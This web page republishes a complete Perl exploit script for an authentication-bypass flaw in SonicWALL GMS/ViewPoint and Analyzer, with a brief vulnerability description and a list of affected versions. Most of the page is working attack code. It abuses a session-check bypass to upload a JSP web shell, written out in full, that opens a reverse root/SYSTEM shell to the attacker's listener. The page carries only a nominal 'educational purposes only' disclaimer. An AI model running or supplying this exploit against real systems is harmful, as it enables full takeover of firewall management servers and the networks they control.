SonicWALL GMS/VIEWPOINT Remote Root Exploit

Written by:

SonicWALL GMS/VIEWPOINT Remote Root Exploit
  • 0.00 / 5 5
0 votes, 0.00 avg. rating (0% score)

The GMS/VIEWPOINT version 6.x and the Analyzer version 7.x are vulnerable to remote attacks which could lead to total control of the system. These versions contains a vulnerability that allows an unauthenticated, remote attacker to bypass the Web interface.

The remote attacker is able to expolit this vulnerability by use of a broken session handling process in the web application.

The SonicWALL® Global Management System (GMS) provides organizations, distributed enterprises and service providers with a powerful and intuitive solution to centrally manage and rapidly deploy SonicWALL firewall, anti-spam, backup and recovery, and secure remote access solutions. Flexibly deployed as software, hardware, or a virtual appliance, SonicWALL GMS offers centralized real-time monitoring, and  comprehensive policy and compliance reporting. For enterprise customers, SonicWALL GMS streamlines security policy management and appliance deployment, minimizing administration overhead. Service Providers can use GMS to simplify the security management of multiple clients and create additional revenue opportunities. For added redundancy and scalability, GMS can be deployed in a cluster  configuration.

Affected Platforms:

  • Windows/Linux

 

Affected Versions:

  • GMS/ViewPoint 5.0.x
  • GMS/ViewPoint/UMA 5.1.x
  • GMS/ViewPoint/UMA 6.0.x
  • GMS/Analyzer/UMA 7.0.x

 

The code below is to be used for educational purposes only!!!

 

#!/usr/bin/perl

##
#  Title:     SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root/SYSTEM exploit
#  Name:      sgmsRCE.pl
#  Author:    Nikolas Sotiriu (lofi) <lofi[at]sotiriu.de>
#
#  Use it only for education or ethical pentesting! The author accepts
#  no liability for damage caused by this tool.
#
##

use strict;
use HTTP::Request::Common qw(POST);
use LWP::UserAgent;
use LWP::Protocol::https;
use Getopt::Std;

my %args;
getopt('hlp:', \%args);

my $victim    = $args{h} || usage();
my $lip	      = $args{l};
my $lport     = $args{p};
my $detect    = $args{d};
my $shellname = "cbs.jsp";

banner();

my $gms_path;
my $target;
my $sysshell;

my $agent = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0,},);
$agent->agent("Mozilla/5.0 (X11; Linux x86_64; rv:11.0) Gecko/20100101 Firefox/11.0");

# Place your Proxy here if needed
#$agent->proxy(['http', 'https'], 'http://localhost:8080/');

print "[+] Checking host ...\n";
my $request = POST "$victim/appliance/applianceMainPage?skipSessionCheck=1",
Content_Type => 'application/x-www-form-urlencoded; charset=UTF-8',
Content  => [   num => "123456",
                action => "show_diagnostics",
                task => "search",
		item => "application_log",
		criteria => "*.*",
		width => "500",
        ];

my $result = $agent->request($request);

if ($result->is_success) {
        print "[+] Host looks vulnerable ...\n";
} else {
        print "[-] Error while connecting ... $result->status_line\n";
	exit(0);
}

my @lines=split("\n",$result->content);

foreach my $line (@lines) {
	if ($line =~ /OPTION VALUE=/) {
		my @a=split("\"", $line);
		if ($a[1] =~ m/logs/i) {
			my @b=split(/logs/i,$a[1]);
			$gms_path=$b[0];
		}
                if ($gms_path ne "") {
			print "[+] GMS Path: $gms_path\n";
			last;
                } else {
			next;
                }
	}
}
if ($gms_path eq "") {
	print "[-] Couldn't get the GMS path ... Maybe not vulnerable\n";
	exit(0);
}

if ($gms_path =~ m/^\//) {
	$target="UNX";
	$gms_path=$gms_path."Tomcat/webapps/appliance/";
	$sysshell="/bin/sh";
	print "[+] Target ist Unix...\n";
} else {
	$target="WIN";
	$gms_path=$gms_path."Tomcat\\webapps\\appliance\\";
	$sysshell="cmd.exe";
	print "[+] Target ist Windows...\n";
}

&_writing_shell;

if (!$detect) {
print "[+] Uploading shell ...\n";
my $request = POST "$victim/appliance/applianceMainPage?skipSessionCheck=1",
Content_Type => 'multipart/form-data',
Content	 => [ 	action => "file_system",
		task => "uploadFile",
		searchFolder => "$gms_path",
		uploadFileName => ["$shellname"]
	];

my $result = $agent->request($request);

if ($result->is_success) {
	print "[+] Upload completed ...\n";
} else {
	print "[-] Error while connecting ... $result->status_line\n";
	exit(0);
}

unlink("$shellname");

print "[+] Spawning remote root/system shell ...\n";
my $result = $agent->get("$victim/appliance/$shellname");

if ($result->is_success) {
        print "[+] Have fun ...\n";
} else {
        print "[-] Error while connecting ... $result->status_line\n";
	exit(0);
}
}

sub _writing_shell {
	open FILE, ">", "$shellname" or die $!;
        print FILE << "EOF";
<%\@page import="java.lang.*"%>
<%\@page import="java.util.*"%>
<%\@page import="java.io.*"%>
<%\@page import="java.net.*"%>
<%
        class StreamConnector extends Thread
        {
                InputStream is;
                OutputStream os;

                StreamConnector( InputStream is, OutputStream os )
                {
                        this.is = is;
                        this.os = os;
                }
                public void run()
                {
                        BufferedReader in  = null;
                        BufferedWriter out = null;
                        try
                        {
                                in  = new BufferedReader( new InputStreamReader( this.is ) );
                                out = new BufferedWriter( new OutputStreamWriter( this.os ) );
                                char buffer[] = new char[8192];
                                int length;
                                while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
                                {
                                        out.write( buffer, 0, length );
                                        out.flush();
                                }
                        } catch( Exception e ){}
                        try
                        {
                                if( in != null )
                                        in.close();
                                if( out != null )
                                        out.close();
                        } catch( Exception e ){}
                }
        }
        try
        {
                Socket socket = new Socket( "$lip", $lport );
                Process process = Runtime.getRuntime().exec( "$sysshell" );
                ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
                ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
        } catch( Exception e ) {}
%>

EOF

close(FILE);
}

sub usage {
    print "\n";
    print " $0 - SonicWALL GMS/VIEWPOINT/Analyzer Remote Root/SYSTEM exploit\n";
    print "====================================================================\n\n";
    print "  Usage:\n";
    print "           $0 -h <http://victim> -l <yourip> -p <yourport>\n";
    print "  Notes:\n";
    print "           Start your netcat listener <nc -lp 4444>\n";
    print "           -d only checks if the Host is vulnerable\n";
    print "\n";
    print "  Author:\n";
    print "           Nikolas Sotiriu (lofi)\n";
    print "           url: www.sotiriu.de\n";
    print "           mail: lofi[at]sotiriu.de\n";
    print "\n";

    exit(1);
}

sub banner {
        print STDERR << "EOF";
--------------------------------------------------------------------------------
       SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root/SYSTEM exploit
--------------------------------------------------------------------------------

EOF
}

Leave a Reply